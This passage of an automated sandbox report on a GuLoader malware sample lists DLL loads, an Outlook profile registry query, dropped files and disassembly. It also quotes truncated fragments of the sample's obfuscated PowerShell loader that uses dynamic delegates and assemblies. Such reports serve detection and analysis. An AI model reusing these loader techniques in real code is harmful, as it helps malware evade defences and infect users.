          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: NDQ211216GM08.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000001.00000002.1434300899.000000000A131000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Temporals $Renovationsvsnet $Juvelbelgningens239), (Coagulable @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Recidivets = [AppDomain]::CurrentDomain.GetA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Jeanett)), $Sofabordene122).DefineDynamicModule($Perfect, $false).DefineType($Undermenuers150, $Flamineous, [System.MulticastDelegate]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08B80C27 push 8B05B59Fh; iretd 1_2_08B80C30
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_3_0019CA98 pushfd ; retf 0019h11_3_0019CA99
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_3_0019EE8C push eax; iretd 11_3_0019EEA9
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_3_0019CF4C push eax; iretd 11_3_0019CF4D
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_3_0019EE60 push eax; iretd 11_3_0019EE65
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_00159C30 push esp; retf 0017h11_2_00159D55
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_00154908 push eax; ret 11_2_00154922
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_00154938 push eax; ret 11_2_00154932
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0015496A push eax; ret 11_2_00154982
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_00154998 push eax; ret 11_2_001549A2
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_00154988 push eax; ret 11_2_00154992
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_016C41EE push ecx; iretd 11_2_016C41F9
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_016C11DA pushfd ; iretd 11_2_016C11DD
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_016C241C push edx; iretd 11_2_016C242F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_016C50BD push EB39B21Fh; iretd 11_2_016C50C2
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_016C3317 push esp; retf 11_2_016C3375
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_016C3386 push esp; retf 11_2_016C3375
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_016C5616 push es; iretd 11_2_016C5614
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_016C5ACD push edi; iretd 11_2_016C5ACE
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_016C56CA push DFDEEA70h; iretd 11_2_016C56D1
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_016C4EB9 push ecx; iretd 11_2_016C4EBA
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Nonalined.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
